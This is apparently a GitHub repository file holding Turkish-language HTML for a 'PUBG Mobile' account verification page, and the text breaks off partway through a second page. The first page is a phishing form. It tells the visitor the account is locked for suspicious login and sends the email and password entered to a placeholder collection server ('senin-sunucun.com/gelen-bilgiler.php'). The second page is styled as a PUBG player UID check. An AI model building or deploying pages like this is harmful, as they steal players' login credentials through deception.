-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathverifyplayer
More file actions
208 lines (185 loc) · 3.91 KB
/
Copy pathverifyplayer
File metadata and controls
208 lines (185 loc) · 3.91 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
# player_verify
PUBG Mobile themed player verification interface
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Hesap Doğrulama</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f5f5f5;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.container {
background-color: white;
padding: 30px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
width: 100%;
max-width: 400px;
}
h2 {
text-align: center;
color: #333;
margin-top: 0;
}
p {
text-align: center;
color: #666;
font-size: 14px;
}
form {
display: flex;
flex-direction: column;
}
input {
padding: 10px;
margin: 10px 0;
border: 1px solid #ddd;
border-radius: 4px;
font-size: 14px;
}
input:focus {
outline: none;
border-color: #4CAF50;
box-shadow: 0 0 5px rgba(76, 175, 80, 0.3);
}
button {
padding: 10px;
margin-top: 15px;
background-color: #4CAF50;
color: white;
border: none;
border-radius: 4px;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s;
}
button:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<div class="container">
<h2>Hesap Doğrulama</h2>
<p>Hesabınız şüpheli giriş nedeniyle kilitlendi. Giriş yaparak doğrulayın.</p>
<form action="https://senin-sunucun.com/gelen-bilgiler.php" method="POST">
<input type="email" name="email" placeholder="E-posta" required>
<input type="password" name="sifre" placeholder="Şifre" required>
<button type="submit">Doğrula</button>
</form>
</div>
</body>
</html>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>PUBG Mobile Oyuncu Doğrulama</title>
<style>
body{
font-family: Arial, sans-serif;
background:url('https://images.unsplash.com/photo-1542751371-adc38448a05e?q=80&w=1600&auto=format&fit=crop') no-repeat center center/cover;
display:flex;
justify-content:center;
align-items:center;
height:100vh;
margin:0;
position:relative;
}
body::before{
content:"";
position:absolute;
width:100%;
height:100%;
background:rgba(0,0,0,0.75);
}
.container{
position:relative;
z-index:2;
background-color: rgba(20,20,20,0.96);
padding: 30px;
border-radius: 12px;
box-shadow: 0 0 25px rgba(240,185,11,0.4);
width: 100%;
max-width: 400px;
border:1px solid #f0b90b;
}
h2{
text-align:center;
color:#f0b90b;
margin-top:0;
}
p{
text-align:center;
color:#ccc;
font-size:14px;
}
form{
display:flex;
flex-direction:column;
}
input{
padding:12px;
margin:10px 0;
border:none;
border-radius:6px;
background:#2b2b2b;
color:white;
font-size:14px;
}
input:focus{
outline:none;
border:1px solid #f0b90b;
}
button{
padding:12px;
margin-top:15px;
background-color:#f0b90b;
color:black;
border:none;
border-radius:6px;
font-size:16px;
font-weight:bold;
cursor:pointer;
transition:0.3s;
}
button:hover{
background:#ffd54a;
}
.status{
display:none;
margin-top:15px;
text-align:center;
color:#00ff99;
}
.note{
margin-top:18px;
text-align:center;
color:#888;
font-size:12px;
}
</style>
</head>
<body>
<div class="container">
<h2>PUBG MOBILE</h2>
<p>
Oyuncu hesabınızı UID ile kontrol edin
</p>
<form onsubmit="kontrolEt(event)">
<input type="text" id="uid" placeholder="Oyuncu UID" required>
<input type="text" placeholder="Sunucu Bölgesi (TR/EU/ASIA)" required>
<button type="submit">
Doğrula
</button>
</form>
<div class="status" id="durum">